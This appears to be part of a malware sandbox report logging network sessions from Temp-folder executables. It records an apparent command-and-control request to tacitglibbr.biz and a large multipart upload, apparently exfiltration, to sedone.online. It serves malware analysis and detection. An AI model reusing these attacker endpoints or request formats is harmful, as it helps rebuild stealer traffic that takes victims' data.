2024-12-16 10:04:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49979	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: tacitglibbr.biz
2024-12-16 10:04:11 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-16 10:04:13 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sja4mslhrh5nfqa9dcj6fniv4v; expires=Fri, 11-Apr-2025 03:50:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqBGLLbmJGvnxuFD4PrhxwlHPV3V9e1PSNYEFx4c11VLm7zQTJccscKLVR8fHyRc0EyDZEZF30p74xggJlp%2BB6yUvA4Ol09r8rAHIqWJh%2FwLCOvNLTNv3Om0KJVJWV%2BCtSM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd90ff83843a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1606&rtt_var=608&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=946&delivery_rate=1818181&cwnd=232&unsent_bytes=0&cid=f3dacd642d6ba0c3&ts=1501&x=0"
2024-12-16 10:04:13 UTC	357	IN	Data Raw: 31 64 32 37 0d 0a 4f 30 53 52 38 5a 72 67 56 6f 66 47 6c 71 61 45 67 62 77 79 2f 4c 74 39 46 38 4e 35 71 47 49 34 6e 68 31 4a 55 77 31 62 33 45 39 41 5a 75 66 54 6f 4e 52 36 70 62 58 7a 68 4c 37 31 7a 6b 65 5a 6c 31 39 32 70 31 75 53 42 46 6e 79 62 69 78 2f 4c 79 32 78 62 51 45 69 38 4a 33 70 68 58 71 6c 6f 2b 36 45 76 74 72 48 45 4a 6e 56 58 79 33 68 48 4d 49 41 57 66 4a 2f 4b 44 68 69 4b 37 41 73 55 79 6a 32 6d 66 2b 44 4d 75 61 71 2b 38 50 68 35 4e 31 59 6b 74 49 51 66 36 35 62 68 45 42 64 35 44 39 7a 63 55 41 2b 71 43 35 32 4a 65 4b 61 75 4a 31 36 2f 4f 54 7a 79 4b 61 37 6e 6c 4f 5a 32 52 46 78 70 78 4c 41 43 6c 44 36 66 69 30 35 66 54 4b 36 4a 31 4d 6d 39 5a 6a 31 69 69 62 72 6f 50 7a 49 35 2b 37 64 45 4e 43 5a 47 47 33 68 51 34 70 54 61 50 39 75 4f Data Ascii: 1d27O0SR8ZrgVofGlqaEgbwy/Lt9F8N5qGI4nh1JUw1b3E9AZufToNR6pbXzhL71zkeZl192p1uSBFnybix/Ly2xbQEi8J3phXqlo+6EvtrHEJnVXy3hHMIAWfJ/KDhiK7AsUyj2mf+DMuaq+8Ph5N1YktIQf65bhEBd5D9zcUA+qC52JeKauJ16/OTzyKa7nlOZ2RFxpxLAClD6fi05fTK6J1Mm9Zj1iibroPzI5+7dENCZGG3hQ4pTaP9uO
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 33 72 50 2f 50 34 2f 48 56 57 5a 50 55 48 33 69 72 46 4d 6b 41 58 66 5a 31 4a 44 74 72 4e 4c 4d 72 57 53 61 7a 33 62 69 46 4c 4b 58 38 74 4f 66 6a 38 39 6c 63 69 4a 73 6c 4e 62 35 56 30 30 42 64 38 44 39 7a 63 57 63 38 76 53 35 53 4b 66 43 62 38 35 41 30 39 36 4c 35 77 66 54 6c 32 31 36 55 32 67 31 2f 72 78 33 4a 43 56 48 31 65 69 77 31 4c 33 66 2b 4b 6b 46 6d 71 39 50 5a 6a 7a 2f 70 72 75 50 45 70 76 79 51 53 64 37 65 45 7a 58 35 57 38 34 42 58 76 31 37 4a 54 39 72 4e 62 67 6a 56 43 6e 31 6d 66 69 46 50 75 32 73 39 63 6e 74 37 4e 35 56 6b 39 30 5a 65 61 41 65 69 6b 34 61 2b 32 64 72 61 53 38 58 75 53 35 4c 5a 4d 61 51 39 6f 77 7a 38 2b 54 72 69 76 2b 6a 32 56 7a 65 67 56 39 37 70 42 54 59 41 55 6a 35 63 54 6b 39 61 6a 2b 7a 4c 6c 63 6d 39 70 54 31 6a 44 Data Ascii: 3rP/P4/HVWZPUH3irFMkAXfZ1JDtrNLMrWSaz3biFLKX8tOfj89lciJslNb5V00Bd8D9zcWc8vS5SKfCb85A096L5wfTl216U2g1/rx3JCVH1eiw1L3f+KkFmq9PZjz/pruPEpvyQSd7eEzX5W84BXv17JT9rNbgjVCn1mfiFPu2s9cnt7N5Vk90ZeaAeik4a+2draS8XuS5LZMaQ9owz8+Triv+j2VzegV97pBTYAUj5cTk9aj+zLlcm9pT1jD
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 69 76 2b 6a 32 56 7a 65 67 56 39 34 71 52 37 50 44 31 76 32 63 53 34 37 59 7a 47 77 4c 6b 73 70 39 35 50 30 69 6a 37 6f 71 76 44 4d 37 2b 6a 56 56 70 37 59 46 54 58 76 57 38 30 59 47 71 51 2f 48 7a 5a 6a 4e 4c 46 76 62 43 58 39 6e 66 2b 55 64 50 72 71 37 59 54 68 37 35 34 49 33 74 55 57 64 61 6f 52 7a 67 42 64 38 58 6f 6f 4e 6d 77 30 75 53 64 58 49 66 65 66 38 59 38 79 35 61 50 77 77 66 54 6d 31 31 79 53 6d 56 45 31 70 67 4f 4b 57 42 72 54 65 44 30 79 51 44 71 76 4a 42 6b 35 76 59 71 34 68 54 69 6c 2f 4c 54 44 34 2b 76 56 56 70 62 5a 44 58 43 76 45 4d 73 4b 58 50 31 79 4a 7a 64 76 4f 4c 34 72 56 53 62 30 6c 4f 71 51 4d 65 4f 32 2f 6f 53 6f 6f 39 6c 49 33 6f 46 66 51 37 45 4d 32 78 59 59 79 58 77 6c 50 32 67 76 2f 6a 49 58 50 37 4f 55 39 4d 4a 73 70 61 2f Data Ascii: iv+j2VzegV94qR7PD1v2cS47YzGwLksp95P0ij7oqvDM7+jVVp7YFTXvW80YGqQ/HzZjNLFvbCX9nf+UdPrq7YTh754I3tUWdaoRzgBd8XooNmw0uSdXIfef8Y8y5aPwwfTm11ySmVE1pgOKWBrTeD0yQDqvJBk5vYq4hTil/LTD4+vVVpbZDXCvEMsKXP1yJzdvOL4rVSb0lOqQMeO2/oSoo9lI3oFfQ7EM2xYYyXwlP2gv/jIXP7OU9MJspa/
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 4e 56 43 6e 74 51 62 65 61 55 54 77 51 6f 61 73 6a 38 73 4b 53 39 68 2f 68 68 55 4b 66 4f 51 37 73 49 72 71 37 32 30 77 2b 71 6a 68 68 43 53 31 78 39 36 72 52 66 42 43 46 76 77 63 53 77 30 5a 6a 47 32 50 31 67 69 2b 35 4c 32 6a 54 58 68 6f 66 48 41 34 65 66 59 58 39 36 58 58 33 4b 35 57 35 4a 41 64 64 74 4b 61 52 42 56 65 61 46 6a 51 47 62 30 6e 37 6a 61 64 4f 6d 6e 2b 4d 7a 70 35 64 64 63 6c 4e 41 55 65 61 6f 66 78 67 6c 66 2b 6e 34 75 4e 47 34 39 73 69 64 66 4a 66 43 63 39 34 30 38 70 65 71 30 77 2f 36 6a 68 68 43 37 7a 68 52 37 70 31 76 56 54 6b 4f 38 65 43 64 78 4e 33 6d 79 4a 46 38 67 39 70 2f 35 68 44 7a 67 72 50 44 46 34 4f 58 64 58 35 72 63 48 6e 71 6c 46 38 51 4b 57 2f 31 7a 49 44 35 6b 50 50 35 6a 47 53 48 72 30 36 44 43 42 65 61 79 34 39 54 71 Data Ascii: NVCntQbeaUTwQoasj8sKS9h/hhUKfOQ7sIrq720w+qjhhCS1x96rRfBCFvwcSw0ZjG2P1gi+5L2jTXhofHA4efYX96XX3K5W5JAddtKaRBVeaFjQGb0n7jadOmn+Mzp5ddclNAUeaofxglf+n4uNG49sidfJfCc9408peq0w/6jhhC7zhR7p1vVTkO8eCdxN3myJF8g9p/5hDzgrPDF4OXdX5rcHnqlF8QKW/1zID5kPP5jGSHr06DCBeay49Tq
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 43 5a 47 47 33 68 51 34 6f 75 55 65 39 6f 4b 44 39 6b 4c 36 56 74 52 6d 6a 71 30 2f 2b 4f 64 4c 33 6b 39 38 2f 74 35 39 35 63 6e 74 30 53 64 62 4d 55 7a 51 64 54 39 32 30 68 4e 6d 67 79 74 69 5a 57 49 4f 47 66 39 70 41 78 39 37 61 30 69 71 62 6b 78 68 44 47 6d 53 6c 79 73 51 76 4a 51 6d 76 71 66 44 30 36 59 6a 58 2b 4d 68 63 2f 73 35 54 30 77 6d 79 6c 6f 76 76 4e 35 65 7a 66 57 5a 4c 55 47 6e 79 6b 47 73 77 45 55 50 5a 2f 4c 54 64 75 50 4c 51 75 57 43 7a 36 6c 50 43 46 4e 2f 66 6b 75 6f 54 68 2b 35 34 49 33 76 41 59 5a 36 38 4c 69 68 38 55 35 54 38 73 50 53 39 68 2f 69 6c 54 4b 66 65 55 39 49 51 78 34 36 6e 31 79 2b 66 6a 30 56 53 56 30 42 6c 30 72 42 37 48 42 45 6a 32 64 43 51 39 5a 6a 57 7a 62 52 64 6d 39 49 75 34 32 6e 54 55 71 66 72 4b 34 66 57 65 54 Data Ascii: CZGG3hQ4ouUe9oKD9kL6VtRmjq0/+OdL3k98/t595cnt0SdbMUzQdT920hNmgytiZWIOGf9pAx97a0iqbkxhDGmSlysQvJQmvqfD06YjX+Mhc/s5T0wmylovvN5ezfWZLUGnykGswEUPZ/LTduPLQuWCz6lPCFN/fkuoTh+54I3vAYZ68Lih8U5T8sPS9h/ilTKfeU9IQx46n1y+fj0VSV0Bl0rB7HBEj2dCQ9ZjWzbRdm9Iu42nTUqfrK4fWeT
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 34 72 42 6a 4d 42 6c 48 77 62 53 49 78 62 44 4c 2b 59 78 6b 68 36 39 4f 67 77 68 66 79 73 76 37 44 36 76 58 56 55 5a 33 50 45 6d 58 68 56 59 6f 52 58 65 30 2f 63 79 64 2f 4c 72 6b 79 46 7a 2b 7a 6c 50 54 43 62 4b 57 69 2f 63 4c 68 35 64 42 43 6d 39 38 51 65 71 67 53 7a 67 68 5a 2f 48 73 76 4e 6d 6f 36 73 69 5a 65 4a 66 79 58 38 59 77 39 36 75 53 36 68 4f 48 37 6e 67 6a 65 2b 41 52 32 72 52 61 4b 48 78 54 6c 50 79 77 39 4c 32 48 2b 49 56 63 6a 38 35 6e 2b 68 6a 48 6a 72 76 48 45 37 65 44 52 56 4a 6a 64 45 48 57 71 45 73 73 47 58 2f 5a 30 4c 54 78 73 50 37 68 74 46 32 62 30 69 37 6a 61 64 4d 57 2f 2b 63 6a 68 6f 38 45 65 68 35 6b 59 65 65 46 44 69 67 74 57 2b 48 67 72 50 47 77 78 75 79 6c 54 49 2f 4f 62 36 6f 6f 30 34 72 62 6d 78 4f 2f 6d 30 6c 4f 65 33 52 Data Ascii: 4rBjMBlHwbSIxbDL+Yxkh69Ogwhfysv7D6vXVUZ3PEmXhVYoRXe0/cyd/LrkyFz+zlPTCbKWi/cLh5dBCm98QeqgSzghZ/HsvNmo6siZeJfyX8Yw96uS6hOH7ngje+AR2rRaKHxTlPyw9L2H+IVcj85n+hjHjrvHE7eDRVJjdEHWqEssGX/Z0LTxsP7htF2b0i7jadMW/+cjho8Eeh5kYeeFDigtW+HgrPGwxuylTI/Ob6oo04rbmxO/m0lOe3R
2024-12-16 10:04:13 UTC	269	IN	Data Raw: 79 51 39 4c 77 6a 39 7a 4b 46 46 35 74 54 74 65 4e 76 43 46 38 34 38 34 39 4a 71 30 6e 4c 4b 78 6a 41 4c 4d 69 77 41 31 76 69 53 45 51 46 75 38 4a 78 49 6f 4c 79 2f 2b 64 51 74 6f 73 34 47 34 32 6e 53 69 70 2b 62 57 34 4f 44 49 55 39 6e 6e 49 56 4b 33 45 63 30 51 58 65 74 77 61 33 38 76 4e 76 35 31 59 47 62 36 6c 4f 4f 54 49 75 69 30 38 34 54 5a 72 5a 35 49 33 6f 46 66 51 4b 49 56 78 41 64 4d 37 54 49 4d 4a 32 55 2b 72 69 70 4f 4b 62 50 64 75 49 52 30 76 66 65 36 68 4f 4c 79 6e 67 6a 4f 69 30 51 67 38 6b 79 61 55 6b 57 79 5a 6d 73 6e 4c 32 48 73 59 78 6b 30 73 38 75 34 78 54 66 33 74 76 4c 48 38 4f 43 5a 62 71 44 2b 42 58 69 6e 44 4e 73 2b 5a 50 74 6c 4a 6a 64 34 4b 50 49 34 57 69 6a 39 6c 4f 37 43 65 71 57 72 74 4a 7a 66 6f 35 59 51 6f 5a 64 66 62 65 46 Data Ascii: yQ9Lwj9zKFF5tTteNvCF84849Jq0nLKxjALMiwA1viSEQFu8JxIoLy/+dQtos4G42nSip+bW4ODIU9nnIVK3Ec0QXetwa38vNv51YGb6lOOTIui084TZrZ5I3oFfQKIVxAdM7TIMJ2U+ripOKbPduIR0vfe6hOLyngjOi0Qg8kyaUkWyZmsnL2HsYxk0s8u4xTf3tvLH8OCZbqD+BXinDNs+ZPtlJjd4KPI4Wij9lO7CeqWrtJzfo5YQoZdfbeF
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 32 62 66 35 0d 0a 30 6d 54 64 55 49 4f 53 43 75 4d 78 30 34 2b 53 73 6c 4b 69 6a 32 6b 48 65 67 55 38 6e 2b 6b 36 5a 56 77 71 75 59 47 55 6f 4c 79 2f 2b 64 51 74 6f 73 34 47 34 32 6e 53 69 70 2b 62 57 34 4f 44 49 55 39 6e 6e 49 56 75 6d 48 63 38 48 53 72 35 52 49 43 56 6f 65 66 42 74 56 6d 61 72 71 72 6a 4b 64 4e 72 71 74 4e 79 6d 75 35 35 6c 6e 64 63 52 63 72 63 4b 68 79 35 64 2b 6e 6f 73 49 53 30 58 74 54 6c 65 5a 72 33 54 2f 73 4a 73 74 65 71 30 77 50 65 6a 68 67 44 4d 67 6b 6f 6d 39 6b 75 59 48 78 54 6c 50 7a 31 78 4e 32 76 77 62 55 74 6d 71 39 4f 2f 67 53 62 33 6f 76 66 53 35 61 54 67 62 70 33 50 45 6e 71 71 47 76 51 2b 64 50 46 2b 4b 44 38 74 43 4b 67 67 53 53 58 32 6c 4d 61 38 4f 75 4b 77 38 38 72 67 34 35 34 65 33 74 5a 66 4c 5a 68 62 67 6b 42 6c Data Ascii: 2bf50mTdUIOSCuMx04+SslKij2kHegU8n+k6ZVwquYGUoLy/+dQtos4G42nSip+bW4ODIU9nnIVumHc8HSr5RICVoefBtVmarqrjKdNrqtNymu55lndcRcrcKhy5d+nosIS0XtTleZr3T/sJsteq0wPejhgDMgkom9kuYHxTlPz1xN2vwbUtmq9O/gSb3ovfS5aTgbp3PEnqqGvQ+dPF+KD8tCKggSSX2lMa8OuKw88rg454e3tZfLZhbgkBl
2024-12-16 10:04:13 UTC	1369	IN	Data Raw: 4d 30 62 4f 31 36 43 58 54 73 33 65 48 43 49 71 58 38 70 6f 71 6d 38 5a 34 49 33 70 34 63 5a 37 4d 64 79 52 5a 5a 75 30 45 56 46 6d 45 2b 76 7a 74 4a 4b 2f 2b 79 2b 35 4d 2b 32 35 72 68 78 2b 6a 74 32 55 61 50 6d 56 45 31 72 6c 75 53 4f 52 71 30 50 78 52 2f 4c 79 48 2b 64 52 6b 54 38 4a 33 32 68 53 4c 30 36 64 50 4b 34 65 4c 49 51 4a 50 56 50 6e 61 77 45 59 70 4f 47 76 6f 2f 63 32 4d 68 65 62 6f 38 47 58 36 6a 77 61 50 58 5a 37 4c 30 70 74 75 6f 2b 70 35 47 33 6f 46 4e 4f 2b 45 4a 69 6c 67 61 75 33 77 35 49 32 6b 36 71 43 34 65 47 4d 32 32 37 34 45 6b 34 36 66 4b 2b 73 33 76 32 46 65 45 33 68 6c 54 67 56 75 45 51 46 57 38 4a 78 4a 78 4a 33 6d 42 59 78 6b 2b 73 38 75 34 74 7a 66 72 71 76 50 53 39 36 37 37 52 35 33 4a 47 58 62 68 56 59 6f 47 47 71 51 76 5a Data Ascii: M0bO16CXTs3eHCIqX8poqm8Z4I3p4cZ7MdyRZZu0EVFmE+vztJK/+y+5M+25rhx+jt2UaPmVE1rluSORq0PxR/LyH+dRkT8J32hSL06dPK4eLIQJPVPnawEYpOGvo/c2Mhebo8GX6jwaPXZ7L0ptuo+p5G3oFNO+EJilgau3w5I2k6qC4eGM2274Ek46fK+s3v2FeE3hlTgVuEQFW8JxJxJ3mBYxk+s8u4tzfrqvPS9677R53JGXbhVYoGGqQvZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49980	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:12 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WBI5PPHVAI58QQIWT2NO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 Data Ascii: ------WBI5PPHVAI58QQIWT2NOContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------WBI5PPHVAI58QQIWT2NOContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------WBI5PPHVAI58QQIWT2NOCont
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:04:12 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
